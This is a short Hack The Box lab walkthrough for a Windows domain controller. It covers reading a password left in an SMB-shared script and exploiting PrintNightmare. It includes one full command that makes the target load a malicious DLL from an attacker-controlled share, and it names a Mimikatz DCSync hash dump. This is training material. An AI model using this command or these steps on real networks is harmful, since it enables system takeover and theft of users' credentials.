Hack The Box: Cicada
Machine IP: 10.10.11.x
OS: Windows
Difficulty: Medium
Cicada involves a child domain controller and exploiting trusts.
1. Reconnaissance
Anonymous SMB access leads to a password in a script: cycle.passwd.
User: cicada\john.
2. Enumeration
John has access to internal shares. We find a document mentioning "Development/Production" passwords. We check for PrintNightmare (CVE-2021-1675). The spooler service is running.
3. Exploitation (PrintNightmare)
We use a python implementation of PrintNightmare to load a malicious DLL.
python3 CVE-2021-1675.py cicada/john:password@10.10.11.x '\\10.10.14.14\share\evil.dll'
We get a System shell.
4. Forest Domination
Inside the box, we perform Snooping.
We verify trusts: nltest /domain_trusts.
We steal the NTLM hash of the machine account.
We use Mimikatz to perform a DCSync attack, dumping the hashes of all users in the specific domain.
Conclusion
A mix of weak file permissions (passwords in scripts) and the devastating PrintNightmare exploit.